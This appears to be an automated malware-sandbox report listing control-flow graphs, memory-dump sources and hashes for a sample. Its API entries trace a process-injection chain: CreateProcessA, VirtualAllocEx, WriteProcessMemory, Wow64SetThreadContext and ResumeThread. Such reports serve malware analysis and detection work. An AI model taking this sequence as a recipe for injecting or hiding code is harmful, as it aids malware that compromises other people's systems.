74ae0f4 CreateProcessA 39825->39828 39826 bda0262 39826->39755 39827->39826 39828->39826 39830 bda0aeb 39829->39830 39901 74adf68 39830->39901 39905 74adf60 39830->39905 39831 bda0b10 39836 74ada78 WriteProcessMemory 39834->39836 39837 74ada70 WriteProcessMemory 39834->39837 39835 bda03d2 39835->39755 39836->39835 39837->39835 39840 74ada78 WriteProcessMemory 39838->39840 39841 74ada70 WriteProcessMemory 39838->39841 39839 bda067c 39840->39839 39841->39839 39843 bda05e1 39842->39843 39844 bda0b5f 39843->39844 39845 74ad3f8 ResumeThread 39843->39845 39846 74ad3f0 ResumeThread 39843->39846 39844->39755 39845->39843 39846->39843 39849 74ad8d9 Wow64SetThreadContext 39847->39849 39850 74ad8e0 Wow64SetThreadContext 39847->39850 39848 bda034f 39849->39848 39850->39848 39852 bda0473 39851->39852 39854 74ada78 WriteProcessMemory 39852->39854 39855 74ada70 WriteProcessMemory 39852->39855 39853 bda0a63 39854->39853 39855->39853 39857 bda091d 39856->39857 39858 bda0b5f 39857->39858 39859 74ad3f8 ResumeThread 39857->39859 39860 74ad3f0 ResumeThread 39857->39860 39858->39755 39859->39857 39860->39857 39862 74ad9f8 VirtualAllocEx 39861->39862 39864 74ada35 39862->39864 39864->39795 39866 74ad9b8 VirtualAllocEx 39865->39866 39868 74ada35 39866->39868 39868->39795 39870 74adac0 WriteProcessMemory 39869->39870 39872 74adb17 39870->39872 39872->39796 39874 74ada78 WriteProcessMemory 39873->39874 39876 74adb17 39874->39876 39876->39796 39878 74ad438 ResumeThread 39877->39878 39880 74ad469 39878->39880 39880->39802 39882 74ad3f8 ResumeThread 39881->39882 39884 74ad469 39882->39884 39884->39802 39886 74ad8e0 Wow64SetThreadContext 39885->39886 39888 74ad96d 39886->39888 39888->39807 39890 74ad925 Wow64SetThreadContext 39889->39890 39892 74ad96d 39890->39892 39892->39807 39894 74ae189 39893->39894 39894->39894 39895 74ae2ee CreateProcessA 39894->39895 39896 74ae34b 39895->39896 39896->39896 39898 74ae0fa CreateProcessA 39897->39898 39900 74ae34b 39898->39900 39902 74adfb3 ReadProcessMemory 39901->39902 39904 74adff7 39902->39904 39904->39831 39906 74adfb3 ReadProcessMemory 39905->39906 39908 74adff7 39906->39908 39908->39831

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 600 74ae0f4-74ae195 604 74ae1ce-74ae1ee 600->604 605 74ae197-74ae1a1 600->605 610 74ae1f0-74ae1fa 604->610 611 74ae227-74ae256 604->611 605->604 606 74ae1a3-74ae1a5 605->606 608 74ae1c8-74ae1cb 606->608 609 74ae1a7-74ae1b1 606->609 608->604 612 74ae1b3 609->612 613 74ae1b5-74ae1c4 609->613 610->611 615 74ae1fc-74ae1fe 610->615 619 74ae258-74ae262 611->619 620 74ae28f-74ae349 CreateProcessA 611->620 612->613 613->613 614 74ae1c6 613->614 614->608 616 74ae200-74ae20a 615->616 617 74ae221-74ae224 615->617 621 74ae20e-74ae21d 616->621 622 74ae20c 616->622 617->611 619->620 623 74ae264-74ae266 619->623 633 74ae34b-74ae351 620->633 634 74ae352-74ae3d8 620->634 621->621 624 74ae21f 621->624 622->621 625 74ae268-74ae272 623->625 626 74ae289-74ae28c 623->626 624->617 628 74ae276-74ae285 625->628 629 74ae274 625->629 626->620 628->628 630 74ae287 628->630 629->628 630->626 633->634 644 74ae3da-74ae3de 634->644 645 74ae3e8-74ae3ec 634->645 644->645 646 74ae3e0 644->646 647 74ae3ee-74ae3f2 645->647 648 74ae3fc-74ae400 645->648 646->645 647->648 649 74ae3f4 647->649 650 74ae402-74ae406 648->650 651 74ae410-74ae414 648->651 649->648 650->651 652 74ae408 650->652 653 74ae426-74ae42d 651->653 654 74ae416-74ae41c 651->654 652->651 655 74ae42f-74ae43e 653->655 656 74ae444 653->656 654->653 655->656 658 74ae445 656->658 658->658
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074AE336
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 72751bcaf2c215b5221f8d2751a3fef6132587442dbd499fad1b48d12027a6af
                            • Instruction ID: 9835ebba3357e7fea88e3cc5897d7592113913847067f3bff07bc964b63498a5
                            • Opcode Fuzzy Hash: 72751bcaf2c215b5221f8d2751a3fef6132587442dbd499fad1b48d12027a6af
                            • Instruction Fuzzy Hash: C3A14DB1D00329DFEB24CF69C841BEEBBB2AF54314F1485AAE815A7380D7749985CF91

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 659 74ae100-74ae195 661 74ae1ce-74ae1ee 659->661 662 74ae197-74ae1a1 659->662 667 74ae1f0-74ae1fa 661->667 668 74ae227-74ae256 661->668 662->661 663 74ae1a3-74ae1a5 662->663 665 74ae1c8-74ae1cb 663->665 666 74ae1a7-74ae1b1 663->666 665->661 669 74ae1b3 666->669 670 74ae1b5-74ae1c4 666->670 667->668 672 74ae1fc-74ae1fe 667->672 676 74ae258-74ae262 668->676 677 74ae28f-74ae349 CreateProcessA 668->677 669->670 670->670 671 74ae1c6 670->671 671->665 673 74ae200-74ae20a 672->673 674 74ae221-74ae224 672->674 678 74ae20e-74ae21d 673->678 679 74ae20c 673->679 674->668 676->677 680 74ae264-74ae266 676->680 690 74ae34b-74ae351 677->690 691 74ae352-74ae3d8 677->691 678->678 681 74ae21f 678->681 679->678 682 74ae268-74ae272 680->682 683 74ae289-74ae28c 680->683 681->674 685 74ae276-74ae285 682->685 686 74ae274 682->686 683->677 685->685 687 74ae287 685->687 686->685 687->683 690->691 701 74ae3da-74ae3de 691->701 702 74ae3e8-74ae3ec 691->702 701->702 703 74ae3e0 701->703 704 74ae3ee-74ae3f2 702->704 705 74ae3fc-74ae400 702->705 703->702 704->705 706 74ae3f4 704->706 707 74ae402-74ae406 705->707 708 74ae410-74ae414 705->708 706->705 707->708 709 74ae408 707->709 710 74ae426-74ae42d 708->710 711 74ae416-74ae41c 708->711 709->708 712 74ae42f-74ae43e 710->712 713 74ae444 710->713 711->710 712->713 715 74ae445 713->715 715->715
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074AE336
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 4959fe90c213b04f1f38c927aa320089b554d8030355ff5b5fc1a945041586be
                            • Instruction ID: 9be4c8318704b5eb6cc2d26e1b89ad286300dc480e5f9000f13781c011ee7127
                            • Opcode Fuzzy Hash: 4959fe90c213b04f1f38c927aa320089b554d8030355ff5b5fc1a945041586be
                            • Instruction Fuzzy Hash: 36914EB1D00329DFEB24CF68C841BEEBBB2AF54314F1485AAE815A7380D7749985CF91

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 716 2d2af19-2d2af37 717 2d2af63-2d2af67 716->717 718 2d2af39-2d2af46 call 2d298a0 716->718 719 2d2af7b-2d2afbc 717->719 720 2d2af69-2d2af73 717->720 725 2d2af48 718->725 726 2d2af5c 718->726 727 2d2afc9-2d2afd7 719->727 728 2d2afbe-2d2afc6 719->728 720->719 771 2d2af4e call 2d2b1c0 725->771 772 2d2af4e call 2d2b1b0 725->772 726->717 729 2d2affb-2d2affd 727->729 730 2d2afd9-2d2afde 727->730 728->727 732 2d2b000-2d2b007 729->732 733 2d2afe0-2d2afe7 call 2d2a270 730->733 734 2d2afe9 730->734 731 2d2af54-2d2af56 731->726 735 2d2b098-2d2b158 731->735 736 2d2b014-2d2b01b 732->736 737 2d2b009-2d2b011 732->737 739 2d2afeb-2d2aff9 733->739 734->739 766 2d2b160-2d2b18b GetModuleHandleW 735->766 767 2d2b15a-2d2b15d 735->767 740 2d2b028-2d2b031 call 2d2a280 736->740 741 2d2b01d-2d2b025 736->741 737->736 739->732 747 2d2b033-2d2b03b 740->747 748 2d2b03e-2d2b043 740->748 741->740 747->748 749 2d2b061-2d2b06e 748->749 750 2d2b045-2d2b04c 748->750 756 2d2b070-2d2b08e 749->756 757 2d2b091-2d2b097 749->757 750->749 752 2d2b04e-2d2b05e call 2d2a290 call 2d2a2a0 750->752 752->749 756->757 768 2d2b194-2d2b1a8 766->768 769 2d2b18d-2d2b193 766->769 767->766 769->768 771->731 772->731
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02D2B17E
                            Memory Dump Source
                            • Source File: 00000008.00000002.1405441372.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2d20000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: c35ce45bcbaab54040c3960e4e51b2a79a37e453ac9e394aea66ad1c54dbc65e
                            • Instruction ID: 8cbfc35e9eda5232aa92914141aa958a09eeaad057ccad36933299a378096622
                            • Opcode Fuzzy Hash: c35ce45bcbaab54040c3960e4e51b2a79a37e453ac9e394aea66ad1c54dbc65e
                            • Instruction Fuzzy Hash: 0C8165B0A00B158FD725CF29C55479ABBF1FF48308F108A2AE09AD7B40D775E849CBA0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 773 2d2590c-2d259d9 CreateActCtxA 775 2d259e2-2d25a3c 773->775 776 2d259db-2d259e1 773->776 783 2d25a4b-2d25a4f 775->783 784 2d25a3e-2d25a41 775->784 776->775 785 2d25a60-2d25a90 783->785 786 2d25a51-2d25a5d 783->786 784->783 790 2d25a42-2d25a4a 785->790 791 2d25a92-2d25b14 785->791 786->785 790->783 794 2d259cf-2d259d9 790->794 794->775 794->776
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 02D259C9
                            Memory Dump Source
                            • Source File: 00000008.00000002.1405441372.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2d20000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: f7df616fac90301ab05c5a3d849d6bf60de1f429576cb93c2f87fab37e9232ab
                            • Instruction ID: 4524eaaa15b16301946f3394688978f908faeb121d7acc8c01ccc591c6a06453
                            • Opcode Fuzzy Hash: f7df616fac90301ab05c5a3d849d6bf60de1f429576cb93c2f87fab37e9232ab
                            • Instruction Fuzzy Hash: 1341E271C00729CFEB28CFA9C885BDDBBB1BF49308F60805AD408AB251DB75694ACF50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 795 2d2449c-2d259d9 CreateActCtxA 798 2d259e2-2d25a3c 795->798 799 2d259db-2d259e1 795->799 806 2d25a4b-2d25a4f 798->806 807 2d25a3e-2d25a41 798->807 799->798 808 2d25a60-2d25a90 806->808 809 2d25a51-2d25a5d 806->809 807->806 813 2d25a42-2d25a4a 808->813 814 2d25a92-2d25b14 808->814 809->808 813->806 817 2d259cf-2d259d9 813->817 817->798 817->799
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 02D259C9
                            Memory Dump Source
                            • Source File: 00000008.00000002.1405441372.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2d20000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 50c617d7534cb71c5317474a785b7b6127f65362a32584323957a189d904244e
                            • Instruction ID: 2413e13553f0d0631b6d633199301f96e5a17242c6aa87c5f55abd6c9ffd41fa
                            • Opcode Fuzzy Hash: 50c617d7534cb71c5317474a785b7b6127f65362a32584323957a189d904244e
                            • Instruction Fuzzy Hash: 7E41D270C04729CBEB28DFA9C885B9DBBB5BF49308F60805AD408AB251DB75694ACF50
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074ADB08
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 276109c24b5da91ba7c41d8331b2ad82b447601e083e979dee89489ebc33f440
                            • Instruction ID: caa9f6b9b28b82225870e846f0c7af8a9784699f43bfdb360e785c2ed5afc947
                            • Opcode Fuzzy Hash: 276109c24b5da91ba7c41d8331b2ad82b447601e083e979dee89489ebc33f440
                            • Instruction Fuzzy Hash: AD2137B6D003599FDB10DFA9C880BEEBBF5FF48310F14842AE919A7641C7789541CBA5
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074ADB08
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 7c0538fd025f7172a69fa753dd0548c5c8130dcbe19da2b7fcbefa407030e2bc
                            • Instruction ID: 6e08fdb3c3f2c8f2c532f3049208b187e20d4c5a21617221cfefefdb5fa4c954
                            • Opcode Fuzzy Hash: 7c0538fd025f7172a69fa753dd0548c5c8130dcbe19da2b7fcbefa407030e2bc
                            • Instruction Fuzzy Hash: 732126B5D003599FDB10CFAAC884BEEBBF5FF48310F10842AE919A7241C7789940CBA4
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074AD95E
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: fd5884923b629ee2f6f27b5f57198ad74bec61226069f5e33bc1fd9b13ea7c5c
                            • Instruction ID: 05fa77488bd348694e9b3b809ac94c08c478ce58806b6615d5a115dbdb00eab2
                            • Opcode Fuzzy Hash: fd5884923b629ee2f6f27b5f57198ad74bec61226069f5e33bc1fd9b13ea7c5c
                            • Instruction Fuzzy Hash: D12159B2D003099FDB10CFAAC484BEEBBF4EF48224F14842AD459A7641CB789545CFA5
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074ADFE8
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: fb66e101741aed9a653d47e34bf4f10372ca76bbfdc8dc871f914c5187fabf6c
                            • Instruction ID: e8d12a2b3c6e8a509902fc2bf370fc25bca373b8c0e9816e147934b1ff8dabe5
                            • Opcode Fuzzy Hash: fb66e101741aed9a653d47e34bf4f10372ca76bbfdc8dc871f914c5187fabf6c
                            • Instruction Fuzzy Hash: 452119B5D003599FDB14DF9AC844BDEBBF5FF48310F10842AE919A7240CB799541CBA5
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D2D7D6,?,?,?,?,?), ref: 02D2D897
                            Memory Dump Source
                            • Source File: 00000008.00000002.1405441372.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2d20000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: bea757e47cb794cf073e58f2ec72ad7bdb4c4716e49b5ee55f2946e0af992aa1
                            • Instruction ID: 147493158cc080cb050d80854d5e9981514608106b8227ef940f5ae822766de7
                            • Opcode Fuzzy Hash: bea757e47cb794cf073e58f2ec72ad7bdb4c4716e49b5ee55f2946e0af992aa1
                            • Instruction Fuzzy Hash: 212103B5D00258EFDB10CF9AD884ADEFBF8EB48320F14841AE914A3310D378A944CF65
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D2D7D6,?,?,?,?,?), ref: 02D2D897
                            Memory Dump Source
                            • Source File: 00000008.00000002.1405441372.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2d20000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 3d7add4ff33bb101a5d150daae321d5c4e294e145534661b883daaf4de4ae10b
                            • Instruction ID: 5a831547372efd3df4cb6192011147229b7f0ba519a3cc61b20379fd0b9af6fb
                            • Opcode Fuzzy Hash: 3d7add4ff33bb101a5d150daae321d5c4e294e145534661b883daaf4de4ae10b
                            • Instruction Fuzzy Hash: D22103B5D00258EFDB10CF9AD884ADEFBF5EB48310F10841AE918A7311D378A944CFA4
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074ADFE8
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 4e977cdc9c89cd546ba8e874958b1e5bbb75655635a2f6cbf557b707a888cd35
                            • Instruction ID: 7a4da01f6c1a8a0fe7b264c130a48325b07d70be8b93db91e203a0b3b0feb3af
                            • Opcode Fuzzy Hash: 4e977cdc9c89cd546ba8e874958b1e5bbb75655635a2f6cbf557b707a888cd35
                            • Instruction Fuzzy Hash: 282128B1D003599FDB14DFAAC840BEEBBF5FF48310F10842AE919A7240CB799541CBA5
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074AD95E
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 1b51b5f3f6d6a2bb2862e1ffa6c8c74faee730a826f546ecbf59f2f11af722b8
                            • Instruction ID: 0f0ad8e7ca2d32d931512b00844a98be0dcedc4b0dd93b8392d1ac5e3852a37d
                            • Opcode Fuzzy Hash: 1b51b5f3f6d6a2bb2862e1ffa6c8c74faee730a826f546ecbf59f2f11af722b8
                            • Instruction Fuzzy Hash: 7A2154B1D003099FDB10CFAAC884BEEBBF4EF48214F10842AD459A7240CB789945CFA4
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074ADA26
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 0f18c6f236afd9f8b3fae01fbc19df8c6b2731c2335b4d4621e6d72d708861a7
                            • Instruction ID: e841fe7292f6c3faf54e62f54841fd29ea20f6b8ddc54514f5a10d6b8be01930
                            • Opcode Fuzzy Hash: 0f18c6f236afd9f8b3fae01fbc19df8c6b2731c2335b4d4621e6d72d708861a7
                            • Instruction Fuzzy Hash: B72164769002489FDB20DFAAC844BEFBFF5EF48320F14881AE519A7651CB35A540CFA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 4c98dee3622c4c75dcc0939602bd4b383d3966353675443a5c2fe6004dde4b20
                            • Instruction ID: 4a296d1022de0dd773b246f7da4835a7febd51b9ef150e2ea7237ecd443e5bfb
                            • Opcode Fuzzy Hash: 4c98dee3622c4c75dcc0939602bd4b383d3966353675443a5c2fe6004dde4b20
                            • Instruction Fuzzy Hash: 0E1149B1D003489FDB24DFAAD8457EEBBF4EB88220F14841AD519A7640CA796541CBA5
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074ADA26
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: faf04c520cec2378b08bd44afcf1e65b1eb60677388d03a8b7a6d86036291e37
                            • Instruction ID: 809d8bad0fc638725ac3267ab540957c918a4159aa0103bb2293cd5b25464608
                            • Opcode Fuzzy Hash: faf04c520cec2378b08bd44afcf1e65b1eb60677388d03a8b7a6d86036291e37
                            • Instruction Fuzzy Hash: 121156729003499FDB20DFAAC844BDFBBF5EF48310F10881AE515A7250CB759540CFA0
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1421249450.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_74a0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: cb762ecfcbea91cf9259219e69241d0de2e494f75d3aadeeeddaa4565cab9c89
                            • Instruction ID: 355964926994ffc56eae8a0d6d9ac4b523253141d5ea854ed9f19ea2e04a83a2
                            • Opcode Fuzzy Hash: cb762ecfcbea91cf9259219e69241d0de2e494f75d3aadeeeddaa4565cab9c89
                            • Instruction Fuzzy Hash: BA1128B1D003498FDB24DFAAC4447DEFBF4EB88214F14841AD519A7640CB79A940CF95
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02D2B17E
                            Memory Dump Source
                            • Source File: 00000008.00000002.1405441372.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_2d20000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 5521c2917fb92d58ca686caf0afa676880f4f1c8424f1ba9dfd7f86290ec5e7d
                            • Instruction ID: 12a187054a607e5c798f0220b349a4b4cb4ce8f514dbc0dd0650fec86daf1e45
                            • Opcode Fuzzy Hash: 5521c2917fb92d58ca686caf0afa676880f4f1c8424f1ba9dfd7f86290ec5e7d
                            • Instruction Fuzzy Hash: BE11DFB6C006598FDB20CF9AC844BDEFBF4EB88218F14851AD819A7710C379A545CFA5
                            APIs
                            • PostMessageW.USER32(?,?,?,?), ref: 0BDA12D5
                            Memory Dump Source
                            • Source File: 00000008.00000002.1422871533.000000000BDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BDA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_bda0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 8106b87c151c8f5cb6764dfdfd05f14bddcb5a8b13d7bdb347d22d1c9e906fe7
                            • Instruction ID: 66f57e71d6bd7f23c762a240cdb636133208c679a8b4bb4a73de1ad993d2bc0f
                            • Opcode Fuzzy Hash: 8106b87c151c8f5cb6764dfdfd05f14bddcb5a8b13d7bdb347d22d1c9e906fe7
                            • Instruction Fuzzy Hash: B411E0B6800249DFDB20CF9AD485BDEFBF4EB48324F10841AE558A7240C375A944CFA5
                            APIs
                            • PostMessageW.USER32(?,?,?,?), ref: 0BDA12D5
                            Memory Dump Source
                            • Source File: 00000008.00000002.1422871533.000000000BDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BDA0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_bda0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 54bc6c446c169f25a09cd80efc48e54c69630d36a06b9f157935c905defc8796
                            • Instruction ID: af030f5514f8f6a545ca141beb3ecb2928639c28117820f596a82ca3aabc9be2
                            • Opcode Fuzzy Hash: 54bc6c446c169f25a09cd80efc48e54c69630d36a06b9f157935c905defc8796
                            • Instruction Fuzzy Hash: 3611C2B58002499FDB10DF9AD945BDEFBF8EB48324F108419E558A7640C375A544CFA5
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID: (q
                            • API String ID: 0-2414175341
                            • Opcode ID: 435bda782894512e362d02782bbda087e2da624439aa3a9bfb605d4f78adf7b7
                            • Instruction ID: fc864299e20ec117a3c6e986a5fbc117f80486da690afe2d92bf2de6e1d82b06
                            • Opcode Fuzzy Hash: 435bda782894512e362d02782bbda087e2da624439aa3a9bfb605d4f78adf7b7
                            • Instruction Fuzzy Hash: 9771C231A043059FDB25DF69D4587AEBBB6EF84300F14856AE6069B290DF74AC49C790
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID: (q
                            • API String ID: 0-2414175341
                            • Opcode ID: 0908849fd3381fbe06677b8e17891882bdda0bf134accb3b66adf2d9bda0723f
                            • Instruction ID: 065e6608b4fa61cb53d1ff463512f4c05dc6518ed72ec616cd91213bf4fb7355
                            • Opcode Fuzzy Hash: 0908849fd3381fbe06677b8e17891882bdda0bf134accb3b66adf2d9bda0723f
                            • Instruction Fuzzy Hash: 30618174A04209DFCB18DF78D455A6ABBF2FF88300B2481AAE906D7251DF31ED45CB91
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f98a97456eaf669027cdede74bb59752fe42c87f61037d87f035d110e41aa84f
                            • Instruction ID: 7d498a40da39559c3fd1204a2d17001710c115b2597103123d584c92ee4e1302
                            • Opcode Fuzzy Hash: f98a97456eaf669027cdede74bb59752fe42c87f61037d87f035d110e41aa84f
                            • Instruction Fuzzy Hash: 2A42C230D14619CFCB15EFA8C8446DCBBB1FF49300F5186A9D6497B264EB30AA99CF91
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d5b1b415147b5420a83093c7eef8da8118c66092c5e5740b0a5d0845dce36d21
                            • Instruction ID: d575d898b502cd17b31a5dbf3b25768ee643b0cf67681df2d8e4edea83dc462f
                            • Opcode Fuzzy Hash: d5b1b415147b5420a83093c7eef8da8118c66092c5e5740b0a5d0845dce36d21
                            • Instruction Fuzzy Hash: FD42E330D04619CFCB15EFA8C8446DCBBB1FF49300F5182E9D6497B265EB30AA99CB91
                            Memory Dump Source
                            • Source File: 00000008.00000002.1420735390.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_5bf0000_xjXWSRbLn.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
